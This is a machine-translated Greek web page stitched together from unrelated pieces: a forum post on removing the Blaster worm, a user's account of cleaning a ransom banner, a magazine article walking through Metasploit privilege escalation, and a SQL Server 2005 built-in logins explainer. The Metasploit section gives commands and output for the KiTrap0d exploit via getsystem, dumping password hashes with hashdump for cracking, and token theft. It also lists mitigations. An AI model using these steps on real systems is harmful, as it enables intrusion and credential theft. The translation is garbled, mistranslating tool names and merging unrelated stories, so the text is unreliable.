Ο τερματισμός του συστήματος προκλήθηκε από το σύστημα εξουσιοδότησης nt. Προσοχή!!! Το σύστημα Nt Authority \\ είναι ένα σκουλήκι !!! Πώς να επιτρέψετε την πρόσβαση σε άλλους υπολογιστές στο λογαριασμό NetworkService

ΣΦΑΛΜΑ NT ΑΡΧΗΣ / ΣΥΣΤΗΜΑΤΟΣ,
Μήνυμα XP - πώς να αφαιρέσετε έναν ιό

Εάν διαθέτετε ρωσική έκδοση, τότε πριν από τη λήψη, φροντίστε να αλλάξετε τη γλώσσα.

Λίγο για τον ίδιο τον ιό:

Χθες το βράδυ, μετά από περίπου τις 23:00 ώρα Μόσχας, σε πολλά φόρουμ, άρχισαν να εμφανίζονται μηνύματα σχετικά με την παράξενη συμπεριφορά των Windows 2000 και των Windows XP κατά την είσοδό τους στο Δίκτυο: το σύστημα εξέδωσε ένα μήνυμα σφάλματος σχετικά με την υπηρεσία RPC και την ανάγκη επανεκκίνησης. Μετά την επανεκκίνηση, το μήνυμα επαναλήφθηκε μετά από το πολύ μερικά λεπτά, και δεν υπήρχε τέλος σε αυτό.

Η έρευνα έδειξε ότι το ξέσπασμα ενός νέου worm δικτύου w32.Blaster.worm, που ξεκίνησε σήμερα, φταίει. Το worm εκμεταλλεύεται μια ευπάθεια που βρέθηκε στις 16 Ιουλίου στην υπηρεσία RPC DCOM που υπάρχει σε όλα τα λειτουργικά συστήματα των οικογενειών Windows 2000, Windows XP και Windows 2003. Αυτή η ευπάθεια είναι μια υπερχείλιση buffer , το οποίο προκαλείται από ένα σωστά συνθεμένο πακέτο TCP / IP που φτάνει στη θύρα 135, 139 ή 445 του επιτιθέμενου υπολογιστή. Επιτρέπει τουλάχιστον την εκτέλεση επίθεσης DoS (DoS σημαίνει "Denial of Service", σε αυτήν την περίπτωση, ο επιτιθέμενος υπολογιστής επανεκκινείται), και ως μέγιστο, για την εκτέλεση οποιουδήποτε κώδικα στη μνήμη του επιτιθέμενου υπολογιστή.

Το πρώτο πράγμα που προκάλεσε την ανησυχία του κοινού του δικτύου ακόμη και πριν από την εμφάνιση του worm ήταν η παρουσία ενός πολύ εύχρηστου exploit (ένα πρόγραμμα εκμετάλλευσης μιας ευπάθειας), το οποίο συνήθως οδηγεί σε μια κατάσταση όπου ο καθένας μπορεί να λάβει αυτό το πρόγραμμα και να αρχίσει να το χρησιμοποιεί για μη ειρηνικούς σκοπούς. Ωστόσο, αυτά ήταν λουλούδια ...

Καθώς εξαπλώνεται, το νέο worm επιτίθεται στη θύρα 135 και, εάν είναι επιτυχές, ξεκινά το πρόγραμμα TFTP.exe, το οποίο κατεβάζει το εκτελέσιμο αρχείο του στον επιτιθέμενο υπολογιστή. Σε αυτήν την περίπτωση, ο χρήστης λαμβάνει ένα μήνυμα σχετικά με τη διακοπή της υπηρεσίας RPC και την επακόλουθη επανεκκίνηση. Μετά την επανεκκίνηση, το worm ξεκινά αυτόματα και ξεκινά τη σάρωση των διαθέσιμων δικτύων από τον υπολογιστή για υπολογιστές με ανοιχτή 135η θύρα. Εάν εντοπίσει ένα, το σκουλήκι επιτίθεται και επαναλαμβάνει τα πάντα από την αρχή. Επιπλέον, κρίνοντας από το ρυθμό εξάπλωσης αυτή τη στιγμή, το worm σύντομα θα βγει στην κορυφή στις λίστες των εταιρειών προστασίας από ιούς.

Υπάρχουν τρεις τρόποι για να προστατευτείτε από το σκουλήκι.

Πρώτον, το ενημερωτικό δελτίο της Microsoft παρέχει συνδέσμους σε ενημερώσεις κώδικα για όλες τις ευπαθείς εκδόσεις των Windows που κλείνουν την τρύπα RPC (αυτές οι ενημερώσεις ενημερώθηκαν στις 16 Ιουλίου, οπότε όσοι ενημερώνουν τακτικά το σύστημα δεν πρέπει να ανησυχούν).

Δεύτερον, εάν η θύρα 135 κλείσει από τείχος προστασίας, το σκουλήκι δεν θα μπορεί να διεισδύσει στον υπολογιστή.

Τρίτον, η απενεργοποίηση του DCOM βοηθά ως έσχατη λύση (δείτε ένα ενημερωτικό δελτίο της Microsoft για λεπτομέρειες σχετικά με αυτήν τη διαδικασία). Επομένως, εάν δεν έχετε ακόμη επιτεθεί από ένα worm, συνιστάται να κάνετε λήψη του ενημερωμένου κώδικα για το λειτουργικό σας σύστημα από τον διακομιστή της Microsoft το συντομότερο δυνατό (για παράδειγμα, χρησιμοποιήστε το Windows Update) ή να ρυθμίσετε τον αποκλεισμό των θυρών 135, 139 και 445 στο τείχος προστασίας.

Εάν ο υπολογιστής σας έχει ήδη μολυνθεί (και η εμφάνιση ενός μηνύματος σφάλματος RPC σημαίνει σαφώς ότι έχει μολυνθεί), τότε πρέπει να απενεργοποιήσετε το DCOM (διαφορετικά, κάθε επόμενη επίθεση θα προκαλέσει επανεκκίνηση) και, στη συνέχεια, πραγματοποιήστε λήψη και εγκατάσταση της ενημέρωσης κώδικα.

Για να καταστρέψετε το worm, πρέπει να διαγράψετε από το κλειδί μητρώου HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ Windows \\ Curr
entVersion \\ Εκτελέστε την καταχώριση "windows auto update" \u003d "msblast.exe" και, στη συνέχεια, βρείτε και διαγράψτε το αρχείο msblast.exe - αυτό είναι το σώμα του worm. Για περισσότερες πληροφορίες σχετικά με τον τρόπο αφαίρεσης του worm, επισκεφθείτε τον ιστότοπο της Symantec.

Προς το παρόν, δεν εντοπίζουν όλα τα ιούς το σκουλήκι - θα είναι δυνατό να βασίζεστε στην προστασία τους μόνο μετά την κυκλοφορία των ενημερώσεων.
Δημοσιεύτηκε από την AHTOH στις 08-17-2003 στις 11:29 μ.μ.

ΕΠΙΚΙΝΔΥΝΗ ΣΧΟΛΗ! Nt Αρχή / Σφάλμα συστήματος

__________________
Κάνω καλό, κάνω καλό ...

Πρόσφατα, ή μάλλον πριν από μια εβδομάδα, άρπαξα ένα σκουλήκι και αυτό δεν συνέβη ποτέ σε όλες τις τσαγιέρες μου! Η ώρα είναι νύχτα - δεν μπορείτε να καλέσετε τον πλοίαρχο και τα χρήματα είναι μόνο στην κάρτα - 200 ρούβλια στη ροή. Τι να κάνετε, χρειάζεστε έναν υπολογιστή με το κόκαλο!

Μέσω του τηλεφώνου ανεβαίνω στις μηχανές αναζήτησης και σφυρί στο όνομα που γράφεται στον τίτλο του θέματος - τη μητέρα μου, τι ανακαλύπτω - αυτό το πλάσμα ζει στο Διαδίκτυο από το 1993 και η εταιρεία της Microsoft γνωρίζει γι 'αυτό, ο δημιουργός τους ενημέρωσε συγκεκριμένα. Σήμερα αυτό το σκουλήκι, μπαίνοντας στον υπολογιστή σας, αποκτά τα δικαιώματα ενός διαχειριστή και είναι σε θέση να κάνει οποιαδήποτε κόλπα.

Αφού ερεύνησα αρκετές δωδεκάδες φόρουμ, ξαναδιαβάζοντας εκατοντάδες συμβουλές την ημέρα, εγώ, χωρίς να γνωρίζω τον ύπνο, ανεβαίνω στα έντερα του συστήματός μου και με χειραψία αρχίζω να ανοίγω φακέλους και αρχεία για τα οποία διάβασα. Με την επιμονή ενός πεινασμένου λύκου, ψάχνω τον λόγο, αλλά ... Είμαι πολύ άπειρος γι 'αυτό. Και πάλι μέσω τηλεφώνου, ανεβαίνω στον ιστότοπό μας και γράφω σε έναν από τους συντονιστές μας ... Το πρόβλημα είναι πολύ δύσκολο και για να μην με βασανίσει, το άτομο συμβουλεύει να κατεδαφίσει το σύστημα και να εγκαταστήσει ένα νέο, αλλά δεν το έκανα ποτέ! Μου λέει στο τηλέφωνο (χωρίς έξοδα για υπεραστικές κλήσεις) πώς να το κάνω βήμα προς βήμα και κάθομαι και γράφω. Μετά από αυτό, περιμένει το αποτέλεσμα, και κάθομαι και καταλαβαίνω ότι λυπάμαι πολύ για τις συσσωρευμένες πληροφορίες ... και παίρνω μια απόφαση, αν το αντέχω, θα έχω πάντα χρόνο και τώρα θα παλέψω μόνος μου.

Σε κάθε περίπτωση, ήξερα ότι οι γκουρού μας ήταν μαζί μου και θα συμβούλευαν τι να κάνουν και πώς. Εν τω μεταξύ, με δικό μου κίνδυνο και κίνδυνο, κάνω τα εξής:

1) Το banner απενεργοποιεί τον υπολογιστή για επανεκκίνηση μετά από 60 δευτερόλεπτα - αυτό σημαίνει ότι αυτή τη φορά πρέπει να αυξηθεί και εγώ, μετά από συμβουλή ενός μέλους του φόρουμ Κατάφερα να γυρίσω το ρολόι πίσω ένα χρόνο!

2) Κοιτάζω ήδη ήρεμα και αργά ολόκληρο το μητρώο και τα προγράμματα μέσω του AnvirTaskManager - ήταν ο μόνος που ρωτούσε για την εμφάνιση ενός νέου προγράμματος, αλλά εγώ, όπως ένας ανόητος, μου επέτρεψε να το παραλείψω.

3) χωρίς να καταλάβω τίποτα εκεί, εκτελώ μια πλήρη σάρωση με το AVAST, έχοντας εγκαταστήσει προηγουμένως όλες τις επεκτάσεις στις ρυθμίσεις.

μετά από 3,5 ώρες μου έδωσε 6 μολυσμένα αρχεία - εδώ είναι

win32 malware-gen (2 τεμάχια)

Fakeinst-T (2 τεμάχια)

Αφαιρώ απλώς αυτά τα παράσιτα χωρίς να προσπαθώ να τα αντιμετωπίσω.

4) Μετά πηγαίνω στο Revo Unystailer και απεγκαθιστώ όλα όσα εγκατέστησα τις τελευταίες ημέρες, μαζί με τους AnvirTaskManager και Reg Organizier.

5) Φορτώνω το AVZ και το τρέχω.

Και έπειτα προκύπτει ένα πρόβλημα - ο δίσκος μου χωρίζεται σε δύο C και ο N. C σαρώνεται κανονικά και δεν βρίσκει τίποτα, μόλις αρχίζει να ανιχνεύει το H ολόκληρος ο υπολογιστής πέφτει. Επανεκκίνηση, το banner δεν εμφανίζεται πλέον και ηρεμώ, το Διαδίκτυο λειτουργεί, αλλά η φυλακή δεν ανοίγει, περνάω από το Google Chrome.

Ελέγξω το H σε λειτουργία on-line. Καθαρώς! Ανοίγω το H, προσπαθώ να επιλέξω ένα φάκελο - πάλι ο υπολογιστής παγώνει σφιχτά! Μετά από αρκετές προσπάθειες ανοίγματος, σαρώω ξανά με το AVAST και, χωρίς να βρω τίποτα, αποφασίζω - να αντιγράψω τα πάντα στο C.

Μετά την αντιγραφή στο C, διαγράφω όλο το H και ανεβαίνω στο αντίγραφο - όλα λειτουργούν !!!

Πριν από μια ώρα, κατέβασα και ενημέρωσα τη Mozila τώρα απολαμβάνω τη ζωή. Έλεγξα τα πάντα και τώρα θα ενημερώσω τον Δρ. W curellt και θα το βάλω για τη νύχτα - ήδη για να ηρεμήσω τη συνείδησή μου! Λάβετε λοιπόν υπόψη σας αγαπητοί συνάδελφοι - δεν είναι όλα τόσο άσχημα. Για την ασφάλεια των υπολογιστών σας, κάντε όπως υποδεικνύεται στο συνημμένο αρχείο !!!

Είθε οι υπολογιστές μας να είναι υγιείς !!!

Καλύτερα σε όλους τους αναγνώστες, Alexey!

Λίγες μέρες πριν από την αποστολή του ζητήματος για εκτύπωση, το Metasploit απέκτησε
νέα ενότητα, για την οποία απλά δεν μπορούσαμε παρά να πούμε. Χάρη σε
νέα ομάδα getsystem, έγινε δυνατή η εναλλαγή
από το επίπεδο χρήστη έως το ring0 με δικαιώματα NT AUTHORITY \\ SYSTEM! Και αυτό είναι σε οποιοδήποτε
εκδόσεις των Windows.

Στις 19 Ιανουαρίου 2010, μια ευπάθεια 0 ημερών έγινε δημόσια, επιτρέποντας
αύξηση των δικαιωμάτων σε οποιαδήποτε έκδοση των Windows ξεκινώντας από το NT 3.1, που κυκλοφόρησε στο
το 1993, και τελειώνει με το νέο "επτά". Στο exploit-db.com από τον χάκερ Tavis
Ο Ormandy δημοσίευσε τόσο τον πηγαίο κώδικα του KiTrap0d exploit όσο και τον μεταγλωττισμένο
δυαδικό έτοιμο προς χρήση. Ο καθένας μπορεί να δοκιμάσει τον αρχικό παφλασμό
πρόθυμος. Για να το κάνετε αυτό, πρέπει απλώς να εξαγάγετε vdmexploit.dll και vdmallowed.exe από το αρχείο,
με κάποιο τρόπο να το μεταφέρετε στη μηχανή του θύματος και να εκτελέσετε το αρχείο exe εκεί. ΣΕ
ως αποτέλεσμα, ανεξάρτητα από τον λογαριασμό χρήστη που εκτελείται
κατά την εκκίνηση, θα εμφανιστεί μια κονσόλα με δικαιώματα χρήστη συστήματος, δηλαδή NT
ΑΡΧΗ \\ ΣΥΣΤΗΜΑ. Για λόγους ελέγχου, μπορείτε να εκτελέσετε το exploit στο μηχάνημά σας,
έχοντας προηγουμένως συνδεθεί στο σύστημα ως κανονικός χρήστης. Μετά την κυκλοφορία
Το exploit θα ανοίξει ένα νέο παράθυρο cmd.exe με μέγιστα δικαιώματα.

Τι κάνει? Φανταστείτε μια κατάσταση που η εκμετάλλευση διαπερνά κάποια εφαρμογή και
παίρνει ένα κέλυφος σε έναν απομακρυσμένο υπολογιστή. Αφήστε το να λειτουργήσει για το Διαδίκτυο
Εξερεύνηση - σε αυτήν την περίπτωση, ο κροτίδα θα έχει πρόσβαση στο σύστημα με τα δικαιώματα
ο χρήστης υπό τον λογαριασμό του οποίου ξεκίνησε το πρόγραμμα περιήγησης. Δεν υποστηρίζω, πολύ
συχνά θα είναι ένας λογαριασμός με δικαιώματα διαχειριστή (ο χρήστης φταίει), αλλά
αν όχι? Εδώ μπορείτε να χρησιμοποιήσετε το KiTrap0d για να αυξήσετε τα προνόμιά σας.
στο NT AUTHORITY \\ SYSTEM! Επιπλέον, ακόμη και οι χρήστες που ανήκουν στην ομάδα
διαχειριστής, δεν μπορεί να έχει πρόσβαση σε ορισμένα μέρη του συστήματος, για παράδειγμα, για
ανάγνωση κατακερματισμού κωδικού χρήστη (περισσότερα για αυτό παρακάτω). Και λογαριασμός συστήματος NT -
μπορώ! Με όλα αυτά, τη στιγμή της δημοσίευσης του άρθρου, ούτε ένα έμπλαστρο από έξω
Η Microsoft δεν έχει κυκλοφορήσει μια ενημέρωση κώδικα για την ευπάθεια.

Λειτουργία "Σύλληψη συστήματος"

Δεν θα δείξουμε τον αρχικό splash σε δράση, γιατί 25
Ιανουάριος, προστέθηκε ένα νέο σενάριο στο Metasploit, χάρη στο οποίο πρέπει να χρησιμοποιηθεί
Το KiTrap0d μόλις βελτιώθηκε. Η επιλογή που περιλαμβάνεται αρχικά στις βάσεις δεδομένων της ενότητας ήταν
ασταθής και δεν λειτούργησε πάντα, αλλά πέρασαν λιγότερο από μισή ημέρα, καθώς όλα τα λάθη ήταν
εξαλείφθηκε. Τώρα η ενότητα γίνεται λήψη μαζί με όλες τις άλλες ενημερώσεις,
οπότε για εγκατάσταση αρκεί να επιλέξετε στοιχείο στο μενού "Metasploit update".
Τώρα, έχοντας πρόσβαση στο απομακρυσμένο σύστημα, μπορείτε να πληκτρολογήσετε "run kitrap0d" και να φέρετε
θα συνενωθεί σε δράση. "Επειδή όμως έχει αποσυρθεί ένα τέτοιο ποτό, συνειδητοποιούμε για αυτήν την επιχείρηση
μια αφοσιωμένη ομάδα ", σκέφτηκαν οι προγραμματιστές του Metasploit.
αποδείχθηκε μια υπέροχη εντολή "κλιμακωτά προνόμια", διαθέσιμη μέσω
επέκταση μετρητή - μας αρέσει πάρα πολύ :).

Έτσι, έχουμε πρόσβαση σε ένα απομακρυσμένο σύστημα (ένα ενδεικτικό παράδειγμα
η εκμετάλλευση δίνεται στο άρθρο "Λειτουργία" Aurora ") και είμαστε στην κονσόλα
metasploit. Ας δούμε πώς κάνουμε τα δικαιώματα:

μετρητής\u003e getuid

Ναι, ένας κανονικός χρήστης. Ίσως ανήκει ακόμη και στην ομάδα
διαχειριστές, αλλά δεν με νοιάζει. Συνδέουμε τη μονάδα στην οποία
την εντολή getsystem που μας ενδιαφέρει και ελέγξτε αν έχει βυθιστεί εμφανίζοντας την
οθόνη βοήθειας:

μετρητής\u003e χρήση priv
Φόρτωση ιδιωτικής επέκτασης ... επιτυχία.
μετρητής\u003e getsystem -h
Χρήση: getsystem
Προσπαθήστε να αναβαθμίσετε το προνόμιο σας σε αυτό του τοπικού συστήματος.
ΕΠΙΛΟΓΕΣ:

H Banner βοήθειας.
-Τ Η τεχνική στη χρήση. (Προεπιλογή στο "0").
0: Όλες οι διαθέσιμες τεχνικές
1: Υπηρεσία - Πλαστοπροσωπία με όνομα (στη μνήμη / διαχειριστής)
2: Υπηρεσία - Πλαστοπροσωπία με όνομα (Dropper / Admin)
3: Υπηρεσία - Διπλασιασμός διακριτικών (στη μνήμη / Διαχειριστής)
4: Exploit - KiTrap0D (στη μνήμη / χρήστη)

Όπως μπορείτε να δείτε, το πακέτο KiTrap0D υλοποιεί μόνο μέρος της λειτουργικότητας της εντολής.
Εάν καταφέρατε να πιάσετε ένα κέλυφος με έναν χρήστη που έχει ήδη δικαιώματα
διαχειριστής και, στη συνέχεια, για να ανεβείτε στο επίπεδο NT AUTHORITY \\ SYSTEM που μπορείτε να χρησιμοποιήσετε
τρεις άλλες τεχνικές (ο διακόπτης -t σας επιτρέπει να επιλέξετε αυτήν που χρειάζεστε). Με τον ένα ή τον άλλο τρόπο, χωρίς καθορισμό
χωρίς καθόλου παραμέτρους, θα πούμε στο metasploit ότι μπορεί να χρησιμοποιήσει
οποιαδήποτε από τις προσεγγίσεις. Συμπεριλαμβανομένου του KiTrap0D, το οποίο θα αυξήσει τα προνόμιά μας στο επίπεδο
"Sistema", ανεξάρτητα από τα δικαιώματα που έχουμε τώρα.

μετρητής\u003e getsystem
... πήρα σύστημα (μέσω τεχνικής 4).

Ναι, λάβαμε ένα μήνυμα σχετικά με μια επιτυχημένη αύξηση των προνομίων και για μια επίθεση
Ήταν KiTrap0D που χρησιμοποιήθηκε - προφανώς, έχει προτεραιότητα. Είμαστε πραγματικά
έχουν αυξηθεί στο σύστημα; Ας δούμε το τρέχον UID (αναγνωριστικό χρήστη):

μετρητής\u003e getuid

Υπάρχει! Μόνο μία εντολή στην κονσόλα metasploit και τα δικαιώματα NT AUTHORITY \\ SYSTEM
εμείς στην τσέπη σας. Επιπλέον, σε γενικές γραμμές, όλα είναι δυνατά. Ταυτόχρονα, επιτρέψτε μου να σας υπενθυμίσω ότι δεν είναι ούτε ένα
Δεν υπήρχε ενημέρωση κώδικα από τη Microsoft τη στιγμή της κυκλοφορίας του περιοδικού.

Απόρριψη κωδικών πρόσβασης

Εφόσον έχετε ήδη πρόσβαση στον λογαριασμό συστήματος, πρέπει να το εξαγάγετε από αυτό
οτιδήποτε χρήσιμο. Το Metasploit έχει μια καταπληκτική εντολή hashdump στο οπλοστάσιό του -
μια πιο προηγμένη έκδοση του διάσημου βοηθητικού προγράμματος pwdump. Επιπλέον, στο τελευταίο
Η έκδοση του metasploit περιελάμβανε μια αναθεωρημένη έκδοση του σεναρίου που χρησιμοποιεί
εκσυγχρονισμένη αρχή της εξαγωγής κατακερματισμού LANMAN / NTLM και δεν έχει ακόμη εντοπιστεί
λογισμικό προστασίας από ιούς. Αλλά αυτό δεν είναι το θέμα. Είναι σημαντικό να εκτελέσετε την εντολή hashdump
Απαιτούνται δικαιώματα NT AUTHORITY \\ SYSTEM. Διαφορετικά, το πρόγραμμα θα δώσει σφάλμα
"[-] priv_passwd_get_sam_hashes: Η λειτουργία απέτυχε: 87". Αυτό είναι επειδή
Τι αποθηκεύει ο κωδικός πρόσβασης LANMAN / NTLM των κωδικών πρόσβασης χρήστη σε ειδικούς κλάδους μητρώου
HKEY_LOCAL_MACHINE \\ SAM και HKEY_LOCAL_MACHINE \\ SECURITY που δεν είναι καν διαθέσιμα
διαχειριστές. Μπορούν να διαβαστούν μόνο με τα δικαιώματα του λογαριασμού συστήματος.
Σε γενικές γραμμές, χρησιμοποιήστε ένα spoof και, στη συνέχεια, κατακλύστε το
δεν είναι απαραίτητο να ανακτήσετε το κατακερματισμό από το μητρώο τοπικά. Αλλά αν είναι έτσι
υπάρχει πιθανότητα, γιατί όχι;

μετρητής\u003e getuid
Όνομα χρήστη διακομιστή: NT AUTHORITY \\ SYSTEM

μετρητής\u003e run hashdump
[*] Λήψη του κλειδιού εκκίνησης ...
[*] Υπολογισμός του πλήκτρου hboot χρησιμοποιώντας το SYSKEY 3ed7 [...]
[*] Λήψη της λίστας χρηστών και των κλειδιών ...
[*] Αποκρυπτογράφηση κλειδιών χρήστη ...
[*] Απόρριψη κατακερματισμού κωδικού πρόσβασης ...

Διαχειριστής: 500:: ...
Επισκέπτης: 501:: ...
Βοήθεια Βοήθεια: 1000:: ...

Ελήφθησαν τα χάλια. Μένει να τα ταΐζουμε σε μερικά από τα ωμή στράτα, για παράδειγμα,
l0phtcrack.

Πώς μπορώ να ανακτήσω τα προνόμιά μου;

Μια αστεία κατάσταση συνέβη όταν προσπάθησα να επιστρέψω τα δικαιώματα του συνηθισμένου
χρήστη πίσω. Βρέθηκε η εντολή rev2self δεν λειτούργησε και ακόμα
παρέμεινε "NT AUTHORITY \\ SYSTEM": προφανώς, έχει σχεδιαστεί για να λειτουργεί με τρία
άλλες προσεγγίσεις που εφαρμόζονται στο getsystem. Αποδείχθηκε για επαναφορά
προνόμια, είναι απαραίτητο να «κλέψουμε» το διακριτικό της διαδικασίας που ξεκίνησε από αυτόν τον χρήστη,
που χρειαζόμαστε. Επομένως, εμφανίζουμε όλες τις διαδικασίες με την εντολή ps και επιλέγουμε από αυτές
κατάλληλος:

μετρητής\u003e ps
Λίστα διεργασιών
============
Διαδρομή χρήστη PID Name Arch
--- ---- ---- ---- ----
0
4 Σύστημα x86 NT ΑΡΧΗ \\ ΣΥΣΤΗΜΑ
370 smss.exe x86 NT AUTHORITY \\ SYSTEM \\ SystemRoot \\ System32 \\ smss.exe
...
1558 explorer.exe x86 WINXPSP3 \\ χρήστης C: \\ WINDOWS \\ Explorer.EXE
...

Όπως μπορούμε να δούμε, το explorer.exe κυκλοφορεί ακριβώς κάτω από τον συνηθισμένο χρήστη
και έχει PID \u003d 1560. Τώρα, στην πραγματικότητα, μπορείτε να "κλέψετε ένα διακριτικό" χρησιμοποιώντας
εντολή steal_token. Το PID μεταβιβάζεται σε αυτήν ως η μόνη παράμετρος
επιθυμητή διαδικασία:

μετρητής\u003e steal_token 1558
Κλεμμένο διακριτικό με όνομα χρήστη: WINXPSP3 \\ user
μετρητής\u003e getuid
Όνομα χρήστη διακομιστή: WINXPSP3 \\ user

Με βάση το πεδίο "Όνομα χρήστη διακομιστή", η λειτουργία ήταν επιτυχής.

Πως δουλεύει?

Τέλος, αξίζει να μιλήσουμε για τη φύση της ευπάθειας που οδήγησε στην εμφάνιση
χωρίζει. Παρουσιάζεται παραβίαση ασφαλείας λόγω σφάλματος στο χειριστή συστήματος.
#GP διακόπτει (ονομάζεται nt! KiTrap). Λόγω αυτής με προνόμια πυρήνα
μπορεί να εκτελεστεί αυθαίρετος κώδικας. Αυτό συμβαίνει επειδή το σύστημα
ελέγχει εσφαλμένα ορισμένες κλήσεις BIOS "και όταν βρίσκεται σε μια πλατφόρμα x86 32 bit
εκτελείται μια εφαρμογή 16-bit. Για να εκμεταλλευτεί την ευπάθεια, δημιουργεί η εκμετάλλευση
Εφαρμογή 16-bit (% windir% \\ twunk_16.exe), χειρίζεται μερικά
δομές συστήματος και καλεί τη λειτουργία NtVdmControl () για εκκίνηση
Windows Virtual DOS Machine (γνωστό και ως υποσύστημα NTVDM), το οποίο είχε ως αποτέλεσμα το προηγούμενο
ο χειρισμός έχει ως αποτέλεσμα μια κλήση στον χειριστή παγίδας #GP και
η εκμετάλλευση ενεργοποιήθηκε. Παρεμπιπτόντως, αυτό συνεπάγεται τον μοναδικό περιορισμό
ένα exploit που λειτουργεί μόνο σε συστήματα 32-bit. Σε 64-bit
Τα OS απλά δεν διαθέτουν εξομοιωτή για την εκτέλεση εφαρμογών 16-bit.

Γιατί οι πληροφορίες με ένα έτοιμο exploit μπήκαν στο κοινό; Σχετικά με τη διαθεσιμότητα
ο συγγραφέας exploit ενημέρωσε τη Microsoft στις αρχές του περασμένου έτους και
ακόμη και έλαβε επιβεβαίωση ότι η έκθεσή του έγινε δεκτή για εξέταση. Μόνο καλάθι
και τώρα εκεί. Για ένα χρόνο δεν υπήρχε επίσημο έμπλαστρο από την εταιρεία και ο συγγραφέας αποφάσισε
δημοσιεύστε τις πληροφορίες δημόσια, ελπίζοντας ότι τα πράγματα θα πάνε γρηγορότερα. Θα δούμε,
Θα κυκλοφορήσει το έμπλαστρο τη στιγμή που θα κυκλοφορήσει το περιοδικό :);

Πώς να προστατεύσετε τον εαυτό σας από εκμεταλλεύσεις

Δεδομένου ότι δεν υπάρχει πλήρης ενημέρωση για την επίλυση της ευπάθειας ακόμα,
πρέπει να χρησιμοποιήσετε λύσεις. Η πιο αξιόπιστη επιλογή είναι
απενεργοποιήστε τα υποσυστήματα MSDOS και WOWEXEC, τα οποία θα στερήσουν αμέσως το exploit
λειτουργικότητα, επειδή δεν θα μπορεί πλέον να καλεί τη συνάρτηση NtVdmControl ()
για να εκτελέσετε το σύστημα NTVDM. Σε παλαιότερες εκδόσεις των Windows, αυτό γίνεται μέσω
μητρώο όπου πρέπει να βρείτε τον κλάδο HKEY_LOCAL_MACHINE \\ SYSTEM \\ CurrentControlSet \\ Control \\ WOW
και προσθέστε κάποιο σύμβολο στο όνομά του. Για σύγχρονο λειτουργικό σύστημα
πρέπει να ορίσετε ένα όριο για την έναρξη εφαρμογών 16-bit
πολιτικές ομάδας. Για να το κάνετε αυτό, καλέστε το GPEDIT.MSC και μετά μεταβείτε στην ενότητα
"Διαμόρφωση χρήστη / Πρότυπα διαχείρισης / Στοιχεία Windows / Συμβατότητα
εφαρμογές "και ενεργοποιήστε την επιλογή" Απόρριψη πρόσβασης σε 16-bit
εφαρμογές ".

WWW

Περιγραφή της ευπάθειας από τον συγγραφέα του exploit:

http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html

Λύση από τη Microsoft για την επίλυση του ζητήματος:

http://support.microsoft.com/kb/979682

ΠΡΟΕΙΔΟΠΟΙΗΣΗ

Πληροφορίες που παρέχονται για εκπαιδευτικούς σκοπούς. Χρησιμοποιώντας το
παράνομοι σκοποί μπορεί να οδηγήσουν σε ποινική ευθύνη.

Ενσωματωμένες συνδέσεις SQL Server 2005, BUILTIN \\ Διαχειριστές, , NT ΑΡΧΗ \\ ΣΥΣΤΗΜΑ, ΑΝΩΝΥΜΗ ΕΤΑΙΡΙΑ

Αμέσως μετά την εγκατάσταση του SQL Server 2005 σε ένα κοντέινερ Συνδεθείτε εμφανίζεται ένα σύνολο συνδέσεων που δημιουργούνται αυτόματα. Πιθανότατα, δεν θα τα χρησιμοποιείτε για τη σύνδεση χρηστών. Παρ 'όλα αυτά, υπάρχουν περιπτώσεις στις οποίες η γνώση των ενσωματωμένων συνδέσεων μπορεί να είναι χρήσιμη (για παράδειγμα, εάν η διαχειριστική σύνδεσή σας αποκλείεται ακούσια).

ε BUILTIN \\ Διαχειριστές (ή BUILTIN \\ Διαχειριστές, ανάλογα με τη γλώσσα του λειτουργικού συστήματος) - η σύνδεση για αυτήν την ομάδα των Windows αποκτά αυτόματα δικαιώματα διαχειριστή συστήματος SQL Server. Σημειώστε ότι εάν ο υπολογιστής είναι μέλος ενός τομέα, αυτή η ομάδα περιλαμβάνει αυτόματα την ομάδα ΤομέαΔιαχειριστές(Domain Admins) και, ως εκ τούτου, οι Admin Domain έχουν πλήρη δικαιώματα στον SQL Server από προεπιλογή. Εάν μια τέτοια κατάσταση είναι ανεπιθύμητη, τότε αυτή η σύνδεση μπορεί να διαγραφεί. Ωστόσο, ακόμη και σε αυτήν την περίπτωση, δεν θα είναι δύσκολο για τους διαχειριστές τομέα να έχουν πρόσβαση στα δεδομένα του SQL Server.

ε Ονομα διακομιστή 2005 MSFTEUser $ Ονομα διακομιστή$Όνομα παρουσίας , Ονομα διακομιστή 2005MSSQLUser $ Ονομα διακομιστή$Όνομα παρουσίας ,Ονομα διακομιστή 2005SQLAgentUser $ Ονομα διακομιστή$Όνομα παρουσίας - αυτές οι τρεις συνδέσεις για ομάδες Windows χρησιμοποιούνται για τη σύνδεση των αντίστοιχων υπηρεσιών στον SQL Server 2005. Σε επίπεδο SQL Server 2005, δεν χρειάζεται να εκτελέσετε καμία λειτουργία μαζί τους, καθώς έχουν ήδη εκχωρηθεί όλα τα απαραίτητα δικαιώματα. Σε σπάνιες περιπτώσεις, ίσως χρειαστεί να προσθέσετε σε αυτές τις ομάδες σε επίπεδο Windows τους λογαριασμούς στους οποίους εκτελούνται οι υπηρεσίες SQL Server.

ε NT ΑΡΧΗ \\ ΥΠΗΡΕΣΙΑ ΔΙΚΤΥΟΥ - Εφαρμογές ASP .NET, συμπεριλαμβανομένων των υπηρεσιών αναφοράς, εκτελούνται κάτω από αυτόν τον λογαριασμό στον Windows Server 2003 (στα Windows 2000, ο λογαριασμός χρησιμοποιείται για το σκοπό αυτό ASPNET). Αυτή η σύνδεση των Windows χρησιμοποιείται για τη σύνδεση σε υπηρεσίες αναφοράς διακομιστή SQL. Του δίνεται αυτόματα τα απαραίτητα δικαιώματα στις βάσεις δεδομένων Μαστήρ, Μsdb και τις βάσεις δεδομένων που χρησιμοποιούνται από τις Υπηρεσίες Αναφοράς.

ε NT ΑΡΧΗ \\ ΣΥΣΤΗΜΑ είναι ο λογαριασμός τοπικού συστήματος του λειτουργικού συστήματος. Αυτή η σύνδεση εμφανίζεται σε καταστάσεις όπου διαμορφώσατε την υπηρεσία SQL Server στον λογαριασμό τοπικού συστήματος κατά την εγκατάσταση. Μπορούμε να πούμε ότι ο SQL Server χρησιμοποιεί αυτά τα στοιχεία σύνδεσης για να αποκτήσει πρόσβαση στον εαυτό του. Φυσικά, αυτή η σύνδεση έχει τα δικαιώματα ενός διαχειριστή συστήματος SQL Server.

